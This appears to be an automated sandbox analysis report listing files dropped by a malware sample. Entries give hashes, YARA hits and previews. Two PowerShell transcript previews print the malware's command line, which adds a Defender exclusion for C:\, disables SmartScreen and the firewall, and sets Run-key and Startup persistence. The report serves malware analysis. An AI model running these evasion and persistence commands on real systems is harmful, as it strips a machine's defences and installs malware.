                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tidwhpf.tmv.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsemctcy.gai.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gs3c2uim.ptv.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\aut41F2.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Users\user\AppData\Local\Temp\autDB25.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Users\user\AppData\Local\Temp\izrksvy

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\izrksvy, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  C:\Users\user\AppData\Local\Temp\syphffm

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\syphffm, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Fri Jul 15 09:58:18 2022, mtime=Fri Jul 15 09:58:18 2022, atime=Fri Jul 15 09:58:07 2022, length=3574272, window=hideshowminimized
                                                                  Category:dropped
                                                                  Size (bytes):849
                                                                  Entropy (8bit):4.645565646955138
                                                                  Encrypted:false
                                                                  SSDEEP:24:8GS4Cv3BvKmMtSGqIAskkWMe0XSL0Pnm:8GS4Cxv6tXqvskkWn0Xe0Pn
                                                                  MD5:1987CE6E2231ACCDD98C82B1C12650CA
                                                                  SHA1:0849982E186BE66030D8C0A5232C8DD525C8C96B
                                                                  SHA-256:4D46B930EC2F47942840E684DBADA4B125D4D7D759019C2599DB5A0EC9DFB448
                                                                  SHA-512:CFAD1CC5C0A023ACF64F36D0180AAE3D48B14162CD2EC275AA06FF87E42D4226C32B0E65EA476C24517EF1610900E0B0098585B2560AE065D5319A6BCAC9CFBA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.... ...,mM.9....~..9....X..9.....6.....................Y....P.O. .:i.....+00.../C:\...................`.1......Pm...PROGRA~3..H......L..T:W....F......................t..P.r.o.g.r.a.m.D.a.t.a.....j.1......TJW..MICROS~4..R.......TJW.TJW.............................M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.....`.2...6..TDW .System.exe..F.......TJW.TJW....A.....................".v.S.y.s.t.e.m...e.x.e.......Y...............-.......X...........RM.8.....C:\ProgramData\MicrosoftNetwork\System.exe....l.i.n.k. .d.e.s.c.r.i.p.t.i.o.n.B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.\.S.y.s.t.e.m...e.x.e.`.......X.......287400...........!a..%.H.VZAj...~.>].........-$..!a..%.H.VZAj...~.>].........-$.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                  C:\Users\user\Documents\20220715\PowerShell_transcript.287400.JMIIYIgj.20220715035820.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15210
                                                                  Entropy (8bit):5.539383092573317
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZ1TL5NddObfbWTkW8eK0qDo1ZPdObfbWTkW8eKDZaTL5NddObfbWTkW8eK0qDoP:geKReKreKheKfeKzYeKCQEFm
                                                                  MD5:62A0047CED17090A813ED21B6250D8B0
                                                                  SHA1:CBD64AC75118E6882E81555463F81C0404EC1F93
                                                                  SHA-256:ABDC7924CE74FF13BD410CFB22BC500F9C83CCB0A5D96D4D9F3797155A6DE146
                                                                  SHA-512:0AAE08546B053867DF58BF75BAA7EE2765981FC3D178852370BC29C8A3E57725C6DD0AA4D2576978913A7F6069452D3F5DFCCBDEBDA922ECADD9DD1C778D4FB4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220715035824..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ...Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ...Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\Progra

                                                                  C:\Users\user\Documents\20220715\PowerShell_transcript.287400.QxpYFwnl.20220715035850.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):17895
                                                                  Entropy (8bit):5.537418761184225
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZwTL5NddObfbWTkW8eK1qDo1ZAdObfbWTkW8eKDZ02TL5NddObfbWTkW8eK1qDX:veKLeKCeK0FeKPeKhIeKk6eKCMM/
                                                                  MD5:AEB7C4F469A7C21396238B8A158BACAB
                                                                  SHA1:6A60D114124A58420AF6067810E9856F2464C05A
                                                                  SHA-256:75BDA310A80A39F608133CA6999545417DC7C87C186F6E8F6DB7AFE27562A7BA
                                                                  SHA-512:BDDAB870D6B36B1C38274A16CFFFD57BF3866ADB6D2BFF83C9DC1E1AFD3BCAD371310DE7D15C238EBF3A768D8EB01EB714C4B9579587E13E89E59BC51E4B57E5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220715035852..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ...Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ...Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ...Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\Progra

                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):9709
                                                                  Entropy (8bit):4.925370375539915
                                                                  Encrypted:false
                                                                  SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOE:6fib4Glkjh4iUxs14r4Lib41
                                                                  MD5:37AED58F152582BDB058325D28DCC407
                                                                  SHA1:8D26BD9238E1BFD3BA661029D51C0E735CE29AE0
                                                                  SHA-256:52715A53B3D20A6510A4F97B6D20C69070A2BC0686BA1FF13E1E7BC5752EE2BA
                                                                  SHA-512:5ACC01C774A989714EBD956899334D327BB0C34C443DA1035275B209E793196AFC91ACC8A57D3E77EE935A2350CADC123F799AC00DC6D0DD9367DE31EA58131F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_15tzdcis.rxm.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_42ajespa.uq1.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_kuyqpgvw.hva.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Windows\Temp\__PSScriptPolicyTest_rjpcgcio.rd0.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:modified
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1

                                                                  C:\Windows\Temp\aut11F3.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Windows\Temp\aut3E62.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Windows\Temp\autCEFA.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
